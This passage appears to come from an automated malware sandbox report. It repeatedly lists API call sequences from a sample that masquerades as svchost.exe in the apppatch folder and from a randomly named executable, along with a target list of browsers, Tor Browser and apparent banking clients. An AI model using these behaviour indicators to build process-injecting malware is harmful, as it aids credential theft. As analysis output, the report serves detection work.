etHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe2_2_02C85890
Source: C:\Windows\apppatch\svchost.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \iexplore.exe2_2_02C85890
Source: C:\Windows\apppatch\svchost.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \firefox.exe2_2_02C85890
Source: C:\Windows\apppatch\svchost.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \tbb-firefox.exe2_2_02C85890
Source: C:\Windows\apppatch\svchost.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe2_2_02C85890
Source: C:\Windows\apppatch\svchost.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe2_2_02C85890
Source: C:\Windows\apppatch\svchost.exeCode function: memset,GetModuleFileNameA,InitializeCriticalSection,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,IsUserAnAdmin,PathFindFileNameA,StrStrIA,IsUserAnAdmin,StrStrIA,IsUserAnAdmin,StrStrIA,CreateMutexA,GetLastError, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|2_2_02C73510
Source: C:\Windows\apppatch\svchost.exeCode function: memset,GetModuleFileNameA,InitializeCriticalSection,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,IsUserAnAdmin,PathFindFileNameA,StrStrIA,IsUserAnAdmin,StrStrIA,IsUserAnAdmin,StrStrIA,CreateMutexA,GetLastError, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|2_2_02C73510
Source: C:\Windows\apppatch\svchost.exeCode function: memset,GetModuleFileNameA,InitializeCriticalSection,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,IsUserAnAdmin,PathFindFileNameA,StrStrIA,IsUserAnAdmin,StrStrIA,IsUserAnAdmin,StrStrIA,CreateMutexA,GetLastError, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|2_2_02C73510
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe6_2_01255890
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \iexplore.exe6_2_01255890
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \firefox.exe6_2_01255890
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \tbb-firefox.exe6_2_01255890
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe6_2_01255890
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe6_2_01255890
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|6_2_01256370
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|6_2_01256370
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|6_2_01256370
